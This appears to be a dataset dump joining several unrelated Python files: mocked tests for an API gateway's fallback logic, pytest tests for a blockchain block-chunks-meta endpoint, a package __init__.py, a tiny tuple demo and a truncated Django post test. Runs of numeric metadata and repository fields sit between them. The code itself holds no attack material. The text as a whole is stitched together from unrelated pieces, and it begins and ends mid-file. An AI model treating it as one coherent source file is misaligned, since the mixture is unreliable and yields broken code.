    """Build a requests.post replacement that simulates `failure_setting`.

    Only the telemetry endpoint is posted to; any other URL falls through
    and returns None, matching the GET mock's behaviour.
    """
    def mock_requests_post(*args, **kwargs):
        if args == (helper.get_service_url("telemetry"),):
            if failure_setting == MockFailure.BOOKMARKS_FAIL_TELEMETRY_FAIL:
                raise requests.exceptions.ConnectionError
            if failure_setting == MockFailure.BOOKMARKS_FAIL_TELEMETRY_TIMEOUT:
                raise requests.exceptions.Timeout
            # Telemetry has no canned payload — an empty 200 body suffices.
            return MockResponse({}, 200)
    return mock_requests_post
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.SUCCESS))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_success(mock_post, mock_get):
    """All services healthy: homepage has all five sections.

    Stacked @mock.patch decorators inject mocks bottom-up, so the
    requests.post mock arrives first — parameter order fixed to match.
    """
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 200
    response = reply.json
    assert len(response) == 5
    assert response["user-profile"] == USER_PROFILE_RESPONSE
    assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
    assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
    assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
    assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_PROFILE_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_profile_fail(mock_post, mock_get):
    """user-profile connection error: gateway answers 503.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_PROFILE_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_profile_timeout(mock_post, mock_get):
    """user-profile timeout: gateway answers 503.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_PROFILE_NOT_FOUND))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_profile_not_found(mock_post, mock_get):
    """user-profile 404 propagates as a 404 from the gateway.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 404
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_bookmarks_fail(mock_post, mock_get):
    """bookmarks failure: trending replaces bookmarks, still 200.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 200
    response = reply.json
    assert len(response) == 5
    assert response["user-profile"] == USER_PROFILE_RESPONSE
    assert response["trending"] == TRENDING_RESPONSE["trending"]
    assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
    assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
    assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_bookmarks_timeout(mock_post, mock_get):
    """bookmarks timeout: trending replaces bookmarks, still 200.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 200
    response = reply.json
    assert len(response) == 5
    assert response["user-profile"] == USER_PROFILE_RESPONSE
    assert response["trending"] == TRENDING_RESPONSE["trending"]
    assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
    assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
    assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_NOT_FOUND))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_bookmarks_not_found(mock_post, mock_get):
    """bookmarks 404: trending replaces bookmarks, still 200.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 200
    response = reply.json
    assert len(response) == 5
    assert response["user-profile"] == USER_PROFILE_RESPONSE
    assert response["trending"] == TRENDING_RESPONSE["trending"]
    assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
    assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
    assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TRENDING_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_bookmarks_fail_trending_fail(mock_post, mock_get):
    """bookmarks AND its trending fallback fail: gateway answers 503.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TRENDING_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_bookmarks_fail_trending_timeout(mock_post, mock_get):
    """bookmarks fails and trending fallback times out: gateway answers 503.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TELEMETRY_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TELEMETRY_FAIL))
def test_api_gateway_bookmarks_fail_telemetry_fail(mock_post, mock_get):
    """bookmarks fails and the telemetry POST also fails: page still renders 200.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 200
    response = reply.json
    assert len(response) == 5
    assert response["user-profile"] == USER_PROFILE_RESPONSE
    assert response["trending"] == TRENDING_RESPONSE["trending"]
    assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
    assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
    assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TELEMETRY_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TELEMETRY_TIMEOUT))
def test_api_gateway_bookmarks_fail_telemetry_timeout(mock_post, mock_get):
    """bookmarks fails and the telemetry POST times out: page still renders 200.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 200
    response = reply.json
    assert len(response) == 5
    assert response["user-profile"] == USER_PROFILE_RESPONSE
    assert response["trending"] == TRENDING_RESPONSE["trending"]
    assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
    assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
    assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.MY_LIST_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_my_list_fail(mock_post, mock_get):
    """my-list connection error: gateway answers 503.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.MY_LIST_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_my_list_timeout(mock_post, mock_get):
    """my-list timeout: gateway answers 503.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.MY_LIST_NOT_FOUND))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_my_list_not_found(mock_post, mock_get):
    """my-list 404 propagates as a 404 from the gateway.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 404
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_fail(mock_post, mock_get):
    """user-recommendations fails: global recommendations used instead, 200.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 200
    response = reply.json
    assert len(response) == 5
    assert response["user-profile"] == USER_PROFILE_RESPONSE
    assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
    assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
    assert response["recommendations"] == GLOBAL_REC_RESPONSE["recommendations"]
    assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_timeout(mock_post, mock_get):
    """user-recommendations times out: global recommendations used instead, 200.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 200
    response = reply.json
    assert len(response) == 5
    assert response["user-profile"] == USER_PROFILE_RESPONSE
    assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
    assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
    assert response["recommendations"] == GLOBAL_REC_RESPONSE["recommendations"]
    assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_NOT_FOUND))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_not_found(mock_post, mock_get):
    """user-recommendations 404: global recommendations used instead, 200.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 200
    response = reply.json
    assert len(response) == 5
    assert response["user-profile"] == USER_PROFILE_RESPONSE
    assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
    assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
    assert response["recommendations"] == GLOBAL_REC_RESPONSE["recommendations"]
    assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_fail_global_rec_fail(mock_post, mock_get):
    """Both recommendation services fail: trending fills the slot, 200.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 200
    response = reply.json
    assert len(response) == 5
    assert response["user-profile"] == USER_PROFILE_RESPONSE
    assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
    assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
    assert response["trending"] == TRENDING_RESPONSE["trending"]
    assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_FAIL_GLOBAL_REC_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_fail_global_rec_timeout(mock_post, mock_get):
    """user-rec fails, global-rec times out: trending fills the slot, 200.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 200
    response = reply.json
    assert len(response) == 5
    assert response["user-profile"] == USER_PROFILE_RESPONSE
    assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
    assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
    assert response["trending"] == TRENDING_RESPONSE["trending"]
    assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_fail_global_rec_fail_trending_fail(mock_post, mock_get):
    """All three recommendation fallbacks fail: gateway answers 503.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_fail_global_rec_fail_trending_timeout(mock_post, mock_get):
    """Recommendation chains fail and trending times out: gateway answers 503.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.RATINGS_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_ratings_fail(mock_post, mock_get):
    """ratings connection error: gateway answers 503.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.RATINGS_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_ratings_timeout(mock_post, mock_get):
    """ratings timeout: gateway answers 503.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.RATINGS_NOT_FOUND))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_ratings_not_found(mock_post, mock_get):
    """ratings 404 propagates as a 404 from the gateway.
    (Mock args are injected bottom-up: post mock first.)"""
    client = app.test_client()
    reply = client.get("/homepage/users/chris_rivers")
    assert reply.status_code == 404
# Canned downstream-service payloads returned by the mocks above and
# compared against the gateway's aggregated response in the tests.
USER_PROFILE_RESPONSE = {
    "id": "chris_rivers",
    "name": "Chris Rivers",
    "email": "chris_rivers@netflix.com"
}
BOOKMARKS_RESPONSE = {
    "bookmarks": [
        {
            "movie": "Harry Potter and the Philosopher's Stone",
            "timecode": "01:20:00"
        },
        {
            "movie": "Harry Potter and the Chamber of Secrets",
            "timecode": "00:01:20"
        }
    ]
}
MY_LIST_RESPONSE = {
    "my-list": ["Harry Potter and the Prisoner of Azkaban", "Harry Potter and the Goblet of Fire"]
}
USER_REC_RESPONSE = {
    "recommendations": ["Harry Potter and the Order of the Phoenix", "Harry Potter and the Half-Blood Prince", "Harry Potter and the Deathly Hallows"],
}
# Fallback used when user-recommendations is unavailable.
GLOBAL_REC_RESPONSE = {
    "recommendations": ["Inception", "Shutter Island", "The Dark Night"]  # "The Dark Night" (sic) — typo in fixture data, harmless
}
RATINGS_RESPONSE = {
    "ratings": [
        {
            "movie": "Harry Potter and the Philosopher's Stone",
            "rating": 5
        },
        {
            "movie": "Twilight",
            "rating": 4
        }
    ]
}
# Fallback used when bookmarks (or both recommendation services) fail.
TRENDING_RESPONSE = {
    "trending": ["The Croods", "Red Dot", "We Can Be Heroes"]
}
| 47.187234
| 268
| 0.739201
| 2,772
| 22,178
| 5.541847
| 0.054113
| 0.066528
| 0.104153
| 0.068741
| 0.890509
| 0.872022
| 0.854837
| 0.843445
| 0.813891
| 0.765135
| 0
| 0.009642
| 0.15822
| 22,178
| 469
| 269
| 47.287846
| 0.81322
| 0
| 0
| 0.535533
| 0
| 0
| 0.134322
| 0.037109
| 0
| 0
| 0
| 0
| 0.228426
| 0
| null | null | 0
| 0.017767
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
549c024986620ad67e449cbc9faab242140578d9
| 9,935
|
py
|
Python
|
thenewboston_node/blockchain/tests/test_list_block_chunks_meta.py
|
fonar/thenewboston-node
|
e8b574b32b3f0ff6d19a764105558ba1f3b31bc2
|
[
"MIT"
] | null | null | null |
thenewboston_node/blockchain/tests/test_list_block_chunks_meta.py
|
fonar/thenewboston-node
|
e8b574b32b3f0ff6d19a764105558ba1f3b31bc2
|
[
"MIT"
] | null | null | null |
thenewboston_node/blockchain/tests/test_list_block_chunks_meta.py
|
fonar/thenewboston-node
|
e8b574b32b3f0ff6d19a764105558ba1f3b31bc2
|
[
"MIT"
] | null | null | null |
from urllib.parse import urlencode
import pytest
from thenewboston_node.business_logic.tests.base import force_blockchain
# NOTE(review): the name says BLOCKCHAIN_STATE but the endpoint is
# block-chunks-meta — consider renaming to API_V1_LIST_BLOCK_CHUNKS_META_URL.
API_V1_LIST_BLOCKCHAIN_STATE_URL = '/api/v1/block-chunks-meta/'
def test_can_list_block_chunk_meta(api_client, file_blockchain_with_three_block_chunks):
    """The listing returns one meta entry per stored chunk, ascending."""
    blockchain = file_blockchain_with_three_block_chunks
    with force_blockchain(blockchain):
        response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL)
        assert response.status_code == 200
        results = response.json()['results']
        assert len(results) == 3
        # Each entry: (start, end, chunk file name); the open (newest) chunk
        # has the xxxx placeholder and is not gzipped.
        expected = (
            (0, 2, '00000000000000000000-00000000000000000002-block-chunk.msgpack.gz'),
            (3, 5, '00000000000000000003-00000000000000000005-block-chunk.msgpack.gz'),
            (6, 7, '00000000000000000006-xxxxxxxxxxxxxxxxxxxx-block-chunk.msgpack'),
        )
        for meta, (start, end, filename) in zip(results, expected):
            path = '/blockchain/block-chunks/0/0/0/0/0/0/0/0/' + filename
            assert meta == {
                'start_block_number': start,
                'end_block_number': end,
                'url_path': path,
                'urls': ['http://localhost:8555' + path],
            }
def test_can_order_block_chunk_meta(api_client, file_blockchain_with_three_block_chunks):
    """Descending ordering by start_block_number reverses the listing."""
    blockchain = file_blockchain_with_three_block_chunks
    with force_blockchain(blockchain):
        response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?ordering=-start_block_number')
        assert response.status_code == 200
        results = response.json()['results']
        assert len(results) == 3
        # Results arrive newest-first; reverse them to compare ascending.
        expected = (
            (0, 2, '00000000000000000000-00000000000000000002-block-chunk.msgpack.gz'),
            (3, 5, '00000000000000000003-00000000000000000005-block-chunk.msgpack.gz'),
            (6, 7, '00000000000000000006-xxxxxxxxxxxxxxxxxxxx-block-chunk.msgpack'),
        )
        for meta, (start, end, filename) in zip(reversed(results), expected):
            path = '/blockchain/block-chunks/0/0/0/0/0/0/0/0/' + filename
            assert meta == {
                'start_block_number': start,
                'end_block_number': end,
                'url_path': path,
                'urls': ['http://localhost:8555' + path],
            }
def test_can_order_block_chunk_meta_with_limit(api_client, file_blockchain_with_three_block_chunks):
    """limit=2 with descending ordering returns only the two newest chunks."""
    blockchain = file_blockchain_with_three_block_chunks
    with force_blockchain(blockchain):
        response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?ordering=-start_block_number&limit=2')
        assert response.status_code == 200
        results = response.json()['results']
        assert len(results) == 2
        expected = (
            (6, 7, '00000000000000000006-xxxxxxxxxxxxxxxxxxxx-block-chunk.msgpack'),
            (3, 5, '00000000000000000003-00000000000000000005-block-chunk.msgpack.gz'),
        )
        for meta, (start, end, filename) in zip(results, expected):
            path = '/blockchain/block-chunks/0/0/0/0/0/0/0/0/' + filename
            assert meta == {
                'start_block_number': start,
                'end_block_number': end,
                'url_path': path,
                'urls': ['http://localhost:8555' + path],
            }
def test_can_order_block_chunk_meta_with_limit_and_offset(api_client, file_blockchain_with_three_block_chunks):
    """limit=1&offset=1 on the descending listing yields the middle chunk."""
    blockchain = file_blockchain_with_three_block_chunks
    with force_blockchain(blockchain):
        response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?ordering=-start_block_number&limit=1&offset=1')
        assert response.status_code == 200
        results = response.json()['results']
        assert len(results) == 1
        path = ('/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
                '00000000000000000003-00000000000000000005-block-chunk.msgpack.gz')
        assert results[0] == {
            'start_block_number': 3,
            'end_block_number': 5,
            'url_path': path,
            'urls': ['http://localhost:8555' + path],
        }
@pytest.mark.parametrize(
    'from_block_number,to_block_number,block_chunk_map',
    (
        # (from, to, {index in filtered listing -> index in full listing})
        (0, None, {0: 0, 1: 1, 2: 2}),
        (1, None, {0: 0, 1: 1, 2: 2}),
        (2, None, {0: 0, 1: 1, 2: 2}),
        (3, None, {0: 1, 1: 2}),
        (4, None, {0: 1, 1: 2}),
        (5, None, {0: 1, 1: 2}),
        (6, None, {0: 2}),
        (7, None, {0: 2}),
        (8, None, {}),
        (None, 10, {0: 0, 1: 1, 2: 2}),
        (None, 9, {0: 0, 1: 1, 2: 2}),
        (None, 8, {0: 0, 1: 1, 2: 2}),
        (None, 7, {0: 0, 1: 1, 2: 2}),
        (None, 6, {0: 0, 1: 1, 2: 2}),
        (None, 5, {0: 0, 1: 1}),
        (None, 4, {0: 0, 1: 1}),
        (None, 3, {0: 0, 1: 1}),
        (None, 2, {0: 0}),
        (None, 1, {0: 0}),
        (None, 0, {0: 0}),
        (0, 10, {0: 0, 1: 1, 2: 2}),
        (0, 9, {0: 0, 1: 1, 2: 2}),
        (0, 8, {0: 0, 1: 1, 2: 2}),
        (0, 7, {0: 0, 1: 1, 2: 2}),
        (0, 6, {0: 0, 1: 1, 2: 2}),
        (0, 5, {0: 0, 1: 1}),
        (1, 5, {0: 0, 1: 1}),
        (2, 5, {0: 0, 1: 1}),
        (3, 5, {0: 1}),
        (4, 5, {0: 1}),
        (5, 5, {0: 1}),
    )
)
def test_filter_by_block_number_range(
    api_client, file_blockchain_with_three_block_chunks, from_block_number, to_block_number, block_chunk_map
):
    """Range filtering returns exactly the chunks named in `block_chunk_map`.

    The map's keys index the filtered listing and its values index the
    unfiltered listing, so each filtered entry is compared against the
    corresponding original entry.
    """
    blockchain = file_blockchain_with_three_block_chunks
    with force_blockchain(blockchain):
        response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL)
        assert response.status_code == 200
        block_chunks = response.json()['results']
        # Sanity-check the unfiltered listing before filtering.
        assert [
            (chunk['start_block_number'], chunk['end_block_number']) for chunk in block_chunks
        ] == [(0, 2), (3, 5), (6, 7)]
    query_parameters = {
        name: value
        for name, value in (
            ('from_block_number', from_block_number),
            ('to_block_number', to_block_number),
        )
        if value is not None
    }
    with force_blockchain(blockchain):
        response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?' + urlencode(query_parameters))
        assert response.status_code == 200
        filtered_block_chunks = response.json()['results']
        assert len(filtered_block_chunks) == len(block_chunk_map)
        for filtered_index, original_index in block_chunk_map.items():
            assert filtered_block_chunks[filtered_index] == block_chunks[original_index]
| 28.548851
| 118
| 0.535682
| 1,148
| 9,935
| 4.383275
| 0.078397
| 0.059618
| 0.06558
| 0.072337
| 0.869038
| 0.833466
| 0.827703
| 0.773052
| 0.764507
| 0.731916
| 0
| 0.157543
| 0.338098
| 9,935
| 347
| 119
| 28.631124
| 0.607664
| 0
| 0
| 0.72956
| 0
| 0.056604
| 0.288576
| 0.170106
| 0
| 0
| 0
| 0
| 0.078616
| 1
| 0.015723
| false
| 0
| 0.009434
| 0
| 0.025157
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b71c7c8ee0ec8c505b04916c37e1b391d5316344
| 220
|
py
|
Python
|
my_utils/__init__.py
|
Damego/DiscordBOT
|
a7f6115a064043c0f8c6834756096086636d3f0f
|
[
"MIT"
] | 3
|
2021-09-22T21:12:29.000Z
|
2021-12-23T16:22:25.000Z
|
my_utils/__init__.py
|
Damego/DiscordBOT
|
a7f6115a064043c0f8c6834756096086636d3f0f
|
[
"MIT"
] | null | null | null |
my_utils/__init__.py
|
Damego/DiscordBOT
|
a7f6115a064043c0f8c6834756096086636d3f0f
|
[
"MIT"
] | 1
|
2021-09-19T08:24:23.000Z
|
2021-09-19T08:24:23.000Z
|
from .asteroid_bot import AsteroidBot
from .errors import *
from .languages import *
from .checks import *
from .checks import _cog_is_enabled
from .consts import multiplier
from .functions import *
from .cog import Cog
| 24.444444
| 37
| 0.8
| 31
| 220
| 5.548387
| 0.451613
| 0.232558
| 0.186047
| 0.255814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145455
| 220
| 8
| 38
| 27.5
| 0.914894
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3fc02f5a153277b2b207f6d4ba4a5b05a1388c83
| 40
|
py
|
Python
|
2020/20200310/demonstration.py
|
cbchoi/SIT32004
|
699598fc321845e46e5cce81c6c2a60999698e6e
|
[
"MIT"
] | 1
|
2019-03-04T05:35:37.000Z
|
2019-03-04T05:35:37.000Z
|
2020/20200310/demonstration.py
|
cbchoi/SIT32004
|
699598fc321845e46e5cce81c6c2a60999698e6e
|
[
"MIT"
] | null | null | null |
2020/20200310/demonstration.py
|
cbchoi/SIT32004
|
699598fc321845e46e5cce81c6c2a60999698e6e
|
[
"MIT"
] | 6
|
2019-03-10T23:39:10.000Z
|
2020-03-20T11:37:12.000Z
|
# Demonstration: tuple literals vs list literals.
t = 1, 2  # parentheses are optional when building a tuple
print(t)
l = [1, 2]  # NOTE: 'l' is easy to confuse with '1'; kept to match the demo
print(l)
| 8
| 10
| 0.45
| 10
| 40
| 1.8
| 0.5
| 0.222222
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 0.25
| 40
| 5
| 11
| 8
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 1
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
b7511532f272bda78607f86d1007400ed7af72b6
| 4,710
|
py
|
Python
|
tests/test_post.py
|
MarieEngel/message_board
|
f5dbc5cf592d3396a2f9358ad25e64a2d858569c
|
[
"MIT"
] | null | null | null |
tests/test_post.py
|
MarieEngel/message_board
|
f5dbc5cf592d3396a2f9358ad25e64a2d858569c
|
[
"MIT"
] | null | null | null |
tests/test_post.py
|
MarieEngel/message_board
|
f5dbc5cf592d3396a2f9358ad25e64a2d858569c
|
[
"MIT"
] | 1
|
2022-03-31T21:59:29.000Z
|
2022-03-31T21:59:29.000Z
|
from django.test import TestCase
class TestPost(TestCase):
fixtures = [
"user_test.json",
"category_test.json",
"post_test.json",
"comment_test.json",
]
def test_add_post(self):
"""Tests if a post created will show up on the home page."""
self.client.login(username="anna", password="password")
response = self.client.post(
"/post/add/",
{
"title": "Some title",
"body": "Some text",
"category": 1,
"_save": "SAVE",
},
)
self.assertRedirects(response, "/")
response = self.client.get("/")
self.assertContains(response, "Some title")
def test_delete_post(self):
"""Tests if a deleted post will not show up on the home page."""
self.client.login(username="anna", password="password")
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
